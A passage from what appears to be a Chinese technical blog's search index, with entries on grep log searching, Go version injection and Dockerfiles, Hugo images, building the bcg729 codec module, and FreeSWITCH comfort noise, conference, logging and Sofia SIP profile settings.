省略文件名:从多个.log文件中搜索ERROR字段日志,并不显示日志文件名 从多个文件中搜索的日志默认每行会带有日志文件名\ngrep -h ERROR *.log 11. 时间范围: 按照时间范围搜索日志 awk \u0026#39;$2\u0026gt;\u0026#34;17:30:00\u0026#34; \u0026amp;\u0026amp; $2\u0026lt;\u0026#34;18:00:00\u0026#34;\u0026#39; trace.log 日志形式如下, $2代表第二列即11:44:58, awk需要指定列\n11-21 16:44:58 /user/info/\n12. 有没有:搜索到第一个匹配行后就停止搜索 grep -m 1 ERROR trace.log 13. 使用正则提取字符串 grep -Eo \u0026#39;cause\u0026#34;:\u0026#34;(.*?)\u0026#34;\u0026#39; test.log cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;B\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; 如果相对提取字符串的结果进行按照出现的次数进行排序,可以使用sort, uniq命令 grep -Eo \u0026lsquo;cause\u0026quot;:\u0026quot;(.*?)\u0026quot;\u0026rsquo; test.log | sort | uniq -c | sort -k1,1 -n\n步骤分解\nsort 对结果进行排序 uniq -c 对结果进行去重并统计出现次数 sort -k1,1 -n 按照第一列的结果,进行数值大小排序 ","permalink":"https://wdd.js.org/shell/grep-docs/","summary":"1. grep 常用参数 参考: GNU Grep 3.0\n--color:高亮显示匹配到的字符串 -v:显示不能被pattern匹配到的 -i:忽略字符大小写 -o:仅显示匹配到的字符串 -q:静默模式,不输出任何信息 -A#:after,匹配到的后#行 -B#:before,匹配到的前#行 -C#:context,匹配到的前后各#行 -E:使用ERE,支持使用扩展的正则表达式 -c:只输出匹配行的计数。 -I:不区分大 小写(只适用于单字符)。 -h:查询多文件时不显示文件名。 -l:查询多文件时只输出包含匹配字符的文件名。 -n:显示匹配行及 行号。 - m: 匹配多少个关键词之后就停止搜索 -s:不显示不存在或无匹配文本的错误信息。 -v:显示不包含匹配文本的所有行。 2. 普通:搜索trace.log 中含有ERROR字段的日志 grep ERROR trace.log 3. 输出文件:可以将日志输出文件中 grep ERROR trace.log \u0026gt; error.log 4. 反向:搜索不包含ERROR字段的日志 grep -v ERROR trace.log 5. 向前:搜索包含ERROR,并且显示ERROR前10行的日志 grep -B 10 ERROR trace.log 6. 向后:搜索包含ERROR字段,并且显示ERROR后10行的日志 grep -A 10 ERROR trace.log 7. 上下文:搜索包含ERROR字段,并且显示ERROR字段前后10行的日志 grep -C 10 ERROR trace.log 8. 多字段:搜索包含ERROR和DEBUG字段的日志 gerp -E \u0026#39;ERROR|DEBUG\u0026#39; trace.","title":"grep常用参考"},{"content":"shell 自动化测试 https://github.com/bats-core/bats-core shell精进 https://github.com/NARKOZ/hacker-scripts https://github.com/trimstray/the-book-of-secret-knowledge https://legacy.gitbook.com/book/learnbyexample/command-line-text-processing https://github.com/dylanaraps/pure-bash-bible https://github.com/dylanaraps/pure-sh-bible https://github.com/Idnan/bash-guide https://github.com/denysdovhan/bash-handbook https://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html https://github.com/jlevy/the-art-of-command-line https://google.github.io/styleguide/shell.xml https://wiki.bash-hackers.org/start https://linuxguideandhints.com/ 安全加固 https://www.lisenet.com/2017/centos-7-server-hardening-guide/ https://highon.coffee/blog/security-harden-centos-7/ https://github.com/trimstray/the-practical-linux-hardening-guide https://github.com/decalage2/awesome-security-hardening https://www.hackingarticles.in/ https://github.com/toniblyx/my-arsenal-of-aws-security-tools ","permalink":"https://wdd.js.org/shell/star-collect/","summary":"shell 自动化测试 https://github.com/bats-core/bats-core shell精进 https://github.com/NARKOZ/hacker-scripts https://github.com/trimstray/the-book-of-secret-knowledge https://legacy.gitbook.com/book/learnbyexample/command-line-text-processing https://github.com/dylanaraps/pure-bash-bible https://github.com/dylanaraps/pure-sh-bible https://github.com/Idnan/bash-guide https://github.com/denysdovhan/bash-handbook https://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html https://github.com/jlevy/the-art-of-command-line https://google.github.io/styleguide/shell.xml https://wiki.bash-hackers.org/start https://linuxguideandhints.com/ 安全加固 https://www.lisenet.com/2017/centos-7-server-hardening-guide/ https://highon.coffee/blog/security-harden-centos-7/ https://github.com/trimstray/the-practical-linux-hardening-guide https://github.com/decalage2/awesome-security-hardening https://www.hackingarticles.in/ https://github.com/toniblyx/my-arsenal-of-aws-security-tools ","title":"Shell 书籍和资料收藏"},{"content":"人声检测 VAD 人声检测(VAD: Voice Activity Detection)是区分语音中是人说话的声音,还是其他例如环境音的一种功能。\n除此以外,人声检测还能用于减少网络中语音包传输的数据量,从而极大的降低语音的带宽,极限情况下能降低50%的带宽。\n在一个通话中,一般都是只有一个人说话,另一人听。很少可能是两个人都说话的。\n例如A在说话的时候,B可能在等待。\n虽然B在等待过程中,B的语音流依然再按照原始速度和编码再发给A, 即使这里面是环境噪音或者是无声。\nA ----\u0026gt; B # A在说话 A \u0026lt;--- B # B在等待过程中,B的语音流依然再按照原始速度和编码再发给A 如果B具有VAD检测功能,那么B就可以在不说话的时候,发送特殊标记的语音流或者通过减少语音流发送的频率,来减少无意义语音的发送。\n从而极大的降低B-\u0026gt;A的语音流。\n下图是Wireshark抓包的两种RTP包,g711编码的占214字节,但是用舒适噪音编码的只有63字节。将近减少了4倍的带宽。\n舒适噪音生成器 CNG 舒适噪音(CN stands for Comfort Noise), 是一种模拟的背景环境音。舒适噪音生成器在接收端根据发送到给的参数,来产生类似接收端的舒适噪音, 用来模拟发送方的噪音环境。\nCN也是一种RTP包的格式,定义在RFC 3389\n舒适噪音的payload, 也被称作静音插入描述帧(SID: a Silence Insertion Descriptor frame), 包括一个字节的数据,用来描述噪音的级别。也可以包含其他的额外的数据。早期版本的舒适噪音的格式定义在RFC 1890中,这个版本的格式只包含一个字段,就是噪音级别。\n噪音级别占用一个字节,其中第一个bit必须是0, 因此噪音级别有127中可能。\n0 1 2 3 4 5 6 7 +-+-+-+-+-+-+-+-+ |0| level | +-+-+-+-+-+-+-+-+ 跟着噪音级别的后续字节都是声音的频谱信息。\nByte 1 2 3 ... M+1 +-----+-----+-----+-----+-----+ |level| N1 | N2 | ... | NM | +-----+-----+-----+-----+-----+ Figure 2: CN Payload Packing Format 在SIP INVITE的SDP中也可以看到编码,如下面的CN\nm=audio 20000 RTP/AVP 8 111 63 103 104 9 0 106 105 13 110 112 113 126 a=rtpmap:106 CN/32000 a=rtpmap:105 CN/16000 a=rtpmap:13 CN/8000 当VAD函数检测到没有人声时,就会发送舒适噪音。通常来说,只有当环境噪音发生变化的时候,才需要发送CN包。接收方在收到新的CN包后,会更新产生舒适噪音的参数。\n比如下图是sngrep抓包关于webrtc的呼叫时,就能看到浏览器送到SIP Server的CN包。\n│ \u0026lt;────────────────────────────────────────────────── RTP (g711a) 130 ───────────────────── │ ──────────────────────────────────── RTP (g711a) 130 ─────────────────────────────────\u0026gt; │ │ ────────────────────────────────────────────────── RTP (g711a) 1168 ───────────────────── │ \u0026lt;\u0026lt;\u0026lt;──── 200 OK (SDP) ────── │ │ │ │ ────────────────────── 200 OK (SDP) ──────────────────\u0026gt;\u0026gt;\u0026gt; │ │ │ ──────────── ACK ─────────\u0026gt; │ │ │ │ \u0026lt;────────────────────────── ACK ───────────────────────── │ │ │ ──────────── ACK ─────────\u0026gt; │ │ │ │ \u0026lt;────────── INFO ────────── │ │ │ │ ────────────────────────── INFO ────────────────────────\u0026gt; │ │ │ \u0026lt;──────────────────────── 200 OK ──────────────────────── │ │ │ ────────── 200 OK ────────\u0026gt; │ │ │ │ \u0026lt;─────────────────────────────────────────────────── RTP (cn) 208 ─────────────────────── │ ───────────────────────────────────── RTP (cn) 208 ───────────────────────────────────\u0026gt; │ │ \u0026lt;────────────────────────── BYE ───────────────────────── │ │ FreeSWITCH WebRTC 录音质量差 FreeSWITCH bridge两个call leg, 一侧是WebRTC一侧是普通SIP终端,在录音的时候发现录音卡顿基本没办法听,但是双发通话的语音是正常的。\n最终发现录音质量差和舒适噪音有关。\n方案1: 全局抑制舒适噪音\n\u0026lt;!-- Video Settings --\u0026gt; \u0026lt;!-- Setting the max bandwdith --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_video_max_bandwidth_in=3mb\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_video_max_bandwidth_out=3mb\u0026#34;/\u0026gt; \u0026lt;!-- WebRTC Video --\u0026gt; \u0026lt;!-- Suppress CNG for WebRTC Audio --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;suppress_cng=true\u0026#34;/\u0026gt; \u0026lt;!-- Enable liberal DTMF for those that can\u0026#39;t get it right --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_liberal_dtmf=true\u0026#34;/\u0026gt; \u0026lt;!-- Helps with WebRTC Audio --\u0026gt; \u0026lt;!-- Stock Video Avatars --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;video_mute_png=$${images_dir}/default-mute.png\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;video_no_avatar_png=$${images_dir}/default-avatar.png\u0026#34;/\u0026gt; 方案2: 在Bleg抑制舒适噪音\n\u0026lt;action application=\u0026#34;set\u0026#34; data=\u0026#34;bridge_generate_comfort_noise=true\u0026#34;/\u0026gt; \u0026lt;action application=\u0026#34;bridge\u0026#34; data=\u0026#34;sofia/user/1000\u0026#34;/\u0026gt; 参考 https://freeswitch.org/confluence/display/FREESWITCH/VAD+and+CNG https://www.rfc-editor.org/rfc/rfc3389 https://www.rfc-editor.org/rfc/rfc1890 https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files#SofiaConfigurationFiles-suppress-cng https://freeswitch.org/confluence/display/FREESWITCH/bridge_generate_comfort_noise ","permalink":"https://wdd.js.org/freeswitch/webrtc-vad-cng/","summary":"人声检测 VAD 人声检测(VAD: Voice Activity Detection)是区分语音中是人说话的声音,还是其他例如环境音的一种功能。\n除此以外,人声检测还能用于减少网络中语音包传输的数据量,从而极大的降低语音的带宽,极限情况下能降低50%的带宽。\n在一个通话中,一般都是只有一个人说话,另一人听。很少可能是两个人都说话的。\n例如A在说话的时候,B可能在等待。\n虽然B在等待过程中,B的语音流依然再按照原始速度和编码再发给A, 即使这里面是环境噪音或者是无声。\nA ----\u0026gt; B # A在说话 A \u0026lt;--- B # B在等待过程中,B的语音流依然再按照原始速度和编码再发给A 如果B具有VAD检测功能,那么B就可以在不说话的时候,发送特殊标记的语音流或者通过减少语音流发送的频率,来减少无意义语音的发送。\n从而极大的降低B-\u0026gt;A的语音流。\n下图是Wireshark抓包的两种RTP包,g711编码的占214字节,但是用舒适噪音编码的只有63字节。将近减少了4倍的带宽。\n舒适噪音生成器 CNG 舒适噪音(CN stands for Comfort Noise), 是一种模拟的背景环境音。舒适噪音生成器在接收端根据发送到给的参数,来产生类似接收端的舒适噪音, 用来模拟发送方的噪音环境。\nCN也是一种RTP包的格式,定义在RFC 3389\n舒适噪音的payload, 也被称作静音插入描述帧(SID: a Silence Insertion Descriptor frame), 包括一个字节的数据,用来描述噪音的级别。也可以包含其他的额外的数据。早期版本的舒适噪音的格式定义在RFC 1890中,这个版本的格式只包含一个字段,就是噪音级别。\n噪音级别占用一个字节,其中第一个bit必须是0, 因此噪音级别有127中可能。\n0 1 2 3 4 5 6 7 +-+-+-+-+-+-+-+-+ |0| level | +-+-+-+-+-+-+-+-+ 跟着噪音级别的后续字节都是声音的频谱信息。\nByte 1 2 3 ... M+1 +-----+-----+-----+-----+-----+ |level| N1 | N2 | .","title":"WebRTC 人声检测与舒适噪音"},{"content":"暴露的变量必须用var定义,不能用const定义\n// main.go var VERSION = \u0026#34;unknow\u0026#34; var SHA = \u0026#34;unknow\u0026#34; var BUILD_TIME = \u0026#34;unknow\u0026#34; ... func main () { app := \u0026amp;cli.App{ Version: VERSION + \u0026#34;\\r\\nsha: \u0026#34; + SHA + \u0026#34;\\r\\nbuild time: \u0026#34; + BUILD_TIME, ... } Makefile\ntag?=v0.0.5 DATE?=$(shell date +%FT%T%z) VERSION_HASH = $(shell git rev-parse HEAD) LDFLAGS=\u0026#39;-X \u0026#34;main.VERSION=$(tag)\u0026#34; -X \u0026#34;main.SHA=$(VERSION_HASH)\u0026#34; -X \u0026#34;main.BUILD_TIME=$(DATE)\u0026#34;\u0026#39; build: CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags $(LDFLAGS) -o wellcli main.go 执行make build, 产生的二进制文件,就含有注入的信息了。\n-ldflags \u0026#39;[pattern=]arg list\u0026#39; arguments to pass on each go tool link invocation. https://golang.google.cn/cmd/go/#hdr-Build_modes https://www.digitalocean.com/community/tutorials/using-ldflags-to-set-version-information-for-go-applications ","permalink":"https://wdd.js.org/golang/inject-version/","summary":"暴露的变量必须用var定义,不能用const定义\n// main.go var VERSION = \u0026#34;unknow\u0026#34; var SHA = \u0026#34;unknow\u0026#34; var BUILD_TIME = \u0026#34;unknow\u0026#34; ... func main () { app := \u0026amp;cli.App{ Version: VERSION + \u0026#34;\\r\\nsha: \u0026#34; + SHA + \u0026#34;\\r\\nbuild time: \u0026#34; + BUILD_TIME, ... } Makefile\ntag?=v0.0.5 DATE?=$(shell date +%FT%T%z) VERSION_HASH = $(shell git rev-parse HEAD) LDFLAGS=\u0026#39;-X \u0026#34;main.VERSION=$(tag)\u0026#34; -X \u0026#34;main.SHA=$(VERSION_HASH)\u0026#34; -X \u0026#34;main.BUILD_TIME=$(DATE)\u0026#34;\u0026#39; build: CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags $(LDFLAGS) -o wellcli main.go 执行make build, 产生的二进制文件,就含有注入的信息了。\n-ldflags \u0026#39;[pattern=]arg list\u0026#39; arguments to pass on each go tool link invocation.","title":"在二进制文件中注入版本信息"},{"content":"FROM golang:1.16.2 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build . FROM scratch WORKDIR /app COPY --from=builder /app/your_app . # 配置时区 COPY --from=builder /usr/share/zoneinfo /usr/share/zoneinfo ENV TZ=Asia/Shanghai EXPOSE 8080 ENTRYPOINT [\u0026#34;./your_app\u0026#34;] ","permalink":"https://wdd.js.org/golang/scratch-dockerfile/","summary":"FROM golang:1.16.2 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build . FROM scratch WORKDIR /app COPY --from=builder /app/your_app . # 配置时区 COPY --from=builder /usr/share/zoneinfo /usr/share/zoneinfo ENV TZ=Asia/Shanghai EXPOSE 8080 ENTRYPOINT [\u0026#34;./your_app\u0026#34;] ","title":"Golang Dockerfile"},{"content":"如何在markdown中插入图片 在static 目录中创建 images 目录,然后把图片放到images目录中。\n在文章中引用的时候\n![](/images/qianxun.jpeg#center) Warning 我之前创建的文件夹的名字叫做 img, 本地可以正常显示,但是部署之后,就无法显示图片了。\n最后我把img改成images才能正常在网页上显示。\n","permalink":"https://wdd.js.org/posts/2022/05/hugo-blog-faq/","summary":"如何在markdown中插入图片 在static 目录中创建 images 目录,然后把图片放到images目录中。\n在文章中引用的时候\n![](/images/qianxun.jpeg#center) Warning 我之前创建的文件夹的名字叫做 img, 本地可以正常显示,但是部署之后,就无法显示图片了。\n最后我把img改成images才能正常在网页上显示。","title":"Hugo博客常见问题以及解决方案"},{"content":"g729编码的占用带宽是g711的1/8,使用g729编码,可以极大的降低带宽的费用。fs原生的mod_g927模块是需要按并发数收费的,但是我们可以使用开源的bcg729模块。\n这里需要准备两个仓库,为了加快clone速度,我将这两个模块导入到gitee上。\nhttps://gitee.com/wangduanduan/mod_bcg729 https://gitee.com/wangduanduan/bcg729 安装前提 已经安装好了freeswitch, 编译mod_bcg729模块,需要指定freeswitch头文件的位置\nstep0: 切换到工作目录 cd /usr/local/src/ step1: clone mod_bcg729 git clone https://gitee.com/wangduanduan/mod_bcg729.git step2: clone bcg729 mod_bcg729模块在编辑的时候,会检查当前目录下有没有bcg729的目录。 如果没有这个目录,就会从github上clone bcg729的项目。 所以我们可以在编译之前,先把bcg729 clone到mob_bcg729目录下\ncd mod_bcg729 git clone https://gitee.com/wangduanduan/bcg729.git step3: 编辑mod_bcg729 编译mod_bcg729需要指定fs头文件switch.h的位置。 在Makefile项目里有FS_INCLUDES这个变量用来定义fs头文件的位置\nFS_INCLUDES=/usr/include/freeswitch FS_MODULES=/usr/lib/freeswitch/mod 如果你的源码头文件路径不是/usr/include/freeswitch, 则需要在执行make命令时通过参数指定, 例如下面编译的时候。\nmake FS_INCLUDES=/usr/local/freeswitch/include/freeswitch Tip 如何找到头文件的目录? 头文件一般在fs安装目录的include/freeswitch目录下 如果还是找不到,则可以使用 find /usr -name switch.h -type f 搜索对应的头文件 step4: 复制so文件 mod_bcg729编译之后,可以把生成的mod_bcg729.so拷贝到fs安装目录的mod目录下\nstep5: 加载模块 命令行加载\nload mod_bcg729 配置文件加载 命令行加载重启后就失效了,可以将加载的模块写入到配置文件中。 在modules.conf.xml中加入\n\u0026lt;load module=\u0026#34;mod_bcg729\u0026#34;/\u0026gt; step5: vars.xml修改 \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;global_codec_prefs=PCMU,PCMA,G729\u0026#34; /\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;outbound_codec_prefs=PCMU,PCMA,G729\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESScmd=\u0026#34;set\u0026#34;data=\u0026#34;media_mix_inbound_outbound_codecs=true\u0026#34;/\u0026gt; step6: sip profile修改 开启转码\n\u0026lt;param name=\u0026#34;disable-transcoding\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt; 然后重启fs, 进入到fs_cli中,输入: show codec, 看看有没有显示729编码。然后就是找话机,测试g729编码了。\n","permalink":"https://wdd.js.org/freeswitch/install-bcg729/","summary":"g729编码的占用带宽是g711的1/8,使用g729编码,可以极大的降低带宽的费用。fs原生的mod_g927模块是需要按并发数收费的,但是我们可以使用开源的bcg729模块。\n这里需要准备两个仓库,为了加快clone速度,我将这两个模块导入到gitee上。\nhttps://gitee.com/wangduanduan/mod_bcg729 https://gitee.com/wangduanduan/bcg729 安装前提 已经安装好了freeswitch, 编译mod_bcg729模块,需要指定freeswitch头文件的位置\nstep0: 切换到工作目录 cd /usr/local/src/ step1: clone mod_bcg729 git clone https://gitee.com/wangduanduan/mod_bcg729.git step2: clone bcg729 mod_bcg729模块在编辑的时候,会检查当前目录下有没有bcg729的目录。 如果没有这个目录,就会从github上clone bcg729的项目。 所以我们可以在编译之前,先把bcg729 clone到mob_bcg729目录下\ncd mod_bcg729 git clone https://gitee.com/wangduanduan/bcg729.git step3: 编辑mod_bcg729 编译mod_bcg729需要指定fs头文件switch.h的位置。 在Makefile项目里有FS_INCLUDES这个变量用来定义fs头文件的位置\nFS_INCLUDES=/usr/include/freeswitch FS_MODULES=/usr/lib/freeswitch/mod 如果你的源码头文件路径不是/usr/include/freeswitch, 则需要在执行make命令时通过参数指定, 例如下面编译的时候。\nmake FS_INCLUDES=/usr/local/freeswitch/include/freeswitch Tip 如何找到头文件的目录? 头文件一般在fs安装目录的include/freeswitch目录下 如果还是找不到,则可以使用 find /usr -name switch.h -type f 搜索对应的头文件 step4: 复制so文件 mod_bcg729编译之后,可以把生成的mod_bcg729.so拷贝到fs安装目录的mod目录下\nstep5: 加载模块 命令行加载\nload mod_bcg729 配置文件加载 命令行加载重启后就失效了,可以将加载的模块写入到配置文件中。 在modules.conf.xml中加入\n\u0026lt;load module=\u0026#34;mod_bcg729\u0026#34;/\u0026gt; step5: vars.xml修改 \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;global_codec_prefs=PCMU,PCMA,G729\u0026#34; /\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;outbound_codec_prefs=PCMU,PCMA,G729\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESScmd=\u0026#34;set\u0026#34;data=\u0026#34;media_mix_inbound_outbound_codecs=true\u0026#34;/\u0026gt; step6: sip profile修改 开启转码","title":"安装bcg729模块"},{"content":"呼入到会议,正常来说,当会议室有且只有一人时,应该会报“当前只有一人的提示音”。但是测试的时候,输入了密码,进入了会议,却没有播报正常的提示音。\n经过排查发现,dialplan中,会议室的名字中含有@符号。\n按照fs的文档,发现@后面应该是profilename, 然而fs的conference.conf.xml却没有这个profile, 进而导致语音无法播报的问题。所以只要加入这个profile, 或者直接用@default, 就可以正确的播报语音了。\nAction data Description confname profile is \u0026ldquo;default\u0026rdquo;, no flags or pin confname+1234 profile is \u0026ldquo;default\u0026rdquo;, pin is 1234 confname@profilename+1234 profile is \u0026ldquo;profilename\u0026rdquo;, pin=1234, no flags confname+1234+flags{mute} profile is \u0026ldquo;default\u0026rdquo;, pin=1234, one flag confname++flags{endconf|moderator} profile is \u0026ldquo;default\u0026rdquo;, no p.i.n., multiple flags bridge:confname:1000@${domain_name} a \u0026ldquo;bridging\u0026rdquo; conference, you must provide another endpoint, or \u0026rsquo;none'. bridge:uuid:none a \u0026ldquo;bridging\u0026rdquo; conference with UUID assigned as conference name 所以,当你遇到问题的时候,应该仔细的再去阅读一下官方的接口文档。\n参考文档\nhttps://txlab.wordpress.com/2012/09/17/setting-up-a-conference-bridge-with-freeswitch/ https://freeswitch.org/confluence/display/FREESWITCH/mod_conference ","permalink":"https://wdd.js.org/freeswitch/conference-announce/","summary":"呼入到会议,正常来说,当会议室有且只有一人时,应该会报“当前只有一人的提示音”。但是测试的时候,输入了密码,进入了会议,却没有播报正常的提示音。\n经过排查发现,dialplan中,会议室的名字中含有@符号。\n按照fs的文档,发现@后面应该是profilename, 然而fs的conference.conf.xml却没有这个profile, 进而导致语音无法播报的问题。所以只要加入这个profile, 或者直接用@default, 就可以正确的播报语音了。\nAction data Description confname profile is \u0026ldquo;default\u0026rdquo;, no flags or pin confname+1234 profile is \u0026ldquo;default\u0026rdquo;, pin is 1234 confname@profilename+1234 profile is \u0026ldquo;profilename\u0026rdquo;, pin=1234, no flags confname+1234+flags{mute} profile is \u0026ldquo;default\u0026rdquo;, pin=1234, one flag confname++flags{endconf|moderator} profile is \u0026ldquo;default\u0026rdquo;, no p.i.n., multiple flags bridge:confname:1000@${domain_name} a \u0026ldquo;bridging\u0026rdquo; conference, you must provide another endpoint, or \u0026rsquo;none'. bridge:uuid:none a \u0026ldquo;bridging\u0026rdquo; conference with UUID assigned as conference name 所以,当你遇到问题的时候,应该仔细的再去阅读一下官方的接口文档。\n参考文档","title":"会议提示音无法正常播放"},{"content":"开启sip信令的日志 这样会让fs把收发的sip信令打印到fs_cli里面,但不是日志文件里面\nsofia global siptrace on # sofia global siptrace off 关闭 开启sofia模块的日志 sofia 模块的日志即使开启,也是输出到fs_cli里面的,不会输出到日志文件里面\nsofia loglevel all 7 # sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] 将fs_cli的输出,写到日志文件里 sofia tracelevel 会将某些日志重定向到日志文件里 sofia tracelevel debug # sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; 注意,debug级别的日志非常多,仅仅适用于debug\n大量的日志写入磁盘\n占用太多的io 磁盘空间可能很快占满 ","permalink":"https://wdd.js.org/freeswitch/log-settings/","summary":"开启sip信令的日志 这样会让fs把收发的sip信令打印到fs_cli里面,但不是日志文件里面\nsofia global siptrace on # sofia global siptrace off 关闭 开启sofia模块的日志 sofia 模块的日志即使开启,也是输出到fs_cli里面的,不会输出到日志文件里面\nsofia loglevel all 7 # sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] 将fs_cli的输出,写到日志文件里 sofia tracelevel 会将某些日志重定向到日志文件里 sofia tracelevel debug # sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; 注意,debug级别的日志非常多,仅仅适用于debug\n大量的日志写入磁盘\n占用太多的io 磁盘空间可能很快占满 ","title":"FS日志设置"},{"content":"About Sofia is a FreeSWITCH™ module (mod_sofia) that provides SIP connectivity to and from FreeSWITCH in the form of a User Agent. A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for handling a certain network protocol; the network protocol in Sofia\u0026rsquo;s case is SIP. Sofia is the general name of any User Agent in FreeSWITCH using the SIP network protocol. For example, Sofia receives calls sent to FreeSWITCH from other SIP User Agents (UAs), sends calls to other UAs, acts as a client to register FreeSWITCH with other UAs, lets clients register with FreeSWITCH, and connects calls (i.e., to local extensions). To add a SIP Provider (Sofia User Agent) to your FreeSWITCH, please see the Interoperability Examples and add the SIP Provider information in an .xml file stored under conf/sip_profiles/\nClick here to expand Table of Contents\nSofia allows for multiple User Agents A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for running a certain network protocol, and a Sofia UA is the same thing but the protocol in that case is SIP. When FreeSWITCH starts, it reads the conf/autoload_configs/sofia.conf.xml file. That file contains a \u0026ldquo;X-PRE-PROCESS\u0026rdquo; directive which instructs FreeSWITCH to subsequently load and merge any conf/sip_profiles/*.xml files. Each *.xml file so loaded and merged should contain a complete description of one or more SIP Profiles. Each SIP Profile so loaded is part of a \u0026ldquo;User Agent\u0026rdquo; or \u0026ldquo;UA\u0026rdquo;; in FreeSWITCH terms, UA = User Agent = Sofia Profile = SIP Profile. Note that the individual UAs so loaded are all merged together by FreeSWITCH and must not interfere with each other: In particular, each UA must have its own unique port on which it accepts connections (the default port for SIP is 5060).\nMultiple User Agents (Profiles) and the Dialplan Why might you want to create multiple User Agents? Here\u0026rsquo;s an example. In my office, I use a firewall. This means that calls I make to locations outside the firewall must use a STUN server to transverse the NAT in the firewall, while calls within the office don\u0026rsquo;t need to use a STUN server. In order to accommodate these requirements, I\u0026rsquo;ve created two different UAs. One of them uses a STUN server and for that matter also connects up to the PSTN through a service provider. The other UA is purely for local SIP calls. Now I\u0026rsquo;ve got two UAs defined by my profiles, each of which can handle a call. When dialing a SIP address or telephone number, which UA is used? That determination is made in the dialplan. One syntax for making a call via Sofia in the dialplan is sofia/profile_name/destination\nSo, the task becomes rather straightforward. Dialplans use pattern matching and other tricks to determine how to handle a call. My dialplan examines what I\u0026rsquo;ve dialed and then determines what profile to use with that call. If I dial a telephone number, the dialplan selects the UA that connects up to the PSTN. If I dial a SIP address outside the firewall, the dialplan selects that same UA because it uses the STUN server. But if I dial a SIP address that\u0026rsquo;s inside the firewall, the dialplan selects the \u0026ldquo;local\u0026rdquo; UA. To understand how to write dialplans, use pattern matching, etc., see Dialplan\nThe Relationship Between SIP Profiles and Domains The following content was written in a mailing list thread by Anthony Minessale in response to questions about how SIP profiles relate to domain names in FreeSWITCH. The best thing to do is take a look at these things from a step back. The domains inside the XML registry are completely different from the domains on the internet and again completely different from domains in sip packets. The profiles are again entirely different from any of the above. Its up to you to align them if you so choose. The default configuration distributed with FreeSWITCH sets up the scenario most likely to load on any machine and work out of the box. That is the primary goal of that configuration, so, It sets the domain in both the directory, the global default domain variable and the name of the internal profile to be identical to the IP addr on the box that can reach the internet. Then it sets the sip to force everything to that value. When you want to detach from this behavior, you are probably on a venture to do some kind of multi-home setup. Aliases in the tag are a list of keys you want to use to use that lead to the current profile your are configuring. Think of it as the /etc/hosts file in Unix, only for profiles. When you define aliases to match all of the possible domains hosted on a particular profile, then when you try to take a user@host.com notation and decide which profile it came from, you can use the aliases to find it providing you have added to that profile. The tag is an indicator telling the profile to open the XML registry in FreeSWITCH and run through any domains defined therein. The 2 key attributes are: alias: [true/false] (automatically create an alias for this domain as mentioned above) parse: [true/false] (scan the domain for gateway entries and include them into this profile) name: [] (either the name of a specific domain or \u0026lsquo;all\u0026rsquo; to denote parsing every domain in the directory)\nAs you showed in your question the default config has If you apply what you have learned above, it will scan for every domain (there is only one by default) and add an alias for it and not parse it for gateways. The default directory uses global config vars to set the domain to match the local IP addr on the box. So now you will have a domain in your config that is your IP addr, and the internal profile will attach to it and add an alias so that value expands to match it. This is explained in a comment at the top of directory/default.xml: FreeSWITCH works off the concept of users and domains just like email. You have users that are in domains for example 1000@domain.com.\nWhen freeswitch gets a register packet it looks for the user in the directory based on the from or to domain in the packet depending on how your sofia profile is configured. Out of the box the default domain will be the IP address of the machine running FreeSWITCH. This IP can be found by typing \u0026ldquo;sofia status\u0026rdquo; at the CLI. You will register your phones to the IP and not the hostname by default. If you wish to register using the domain please open vars.xml in the root conf directory and set the default domain to the hostname you desire. Then you would use the domain name in the client instead of the IP address to register with FreeSWITCH.\nSo having more than one profile with the default of is going to end up aliasing the same domains into all profiles who call it and cause an overwrite in the lookup table and probably an error in your logs somewhere. If you had parse=\u0026ldquo;true\u0026rdquo; on all of them, they would all try and register to the gateways in all of your domains. If you look at the stock config, external.xml is a good example of a secondary profile, it has so no aliases, and yes parse \u0026hellip; the exact opposite of the internal so that all the gateways would register from external and internal would bind to the local IP addr. So, you probably want to use separate per domain per profile you want to bind it to in more complicated setups.\nStructure of a Profile Each profile may contain several different subsections. At the present time there\u0026rsquo;s no XSD or DTD for 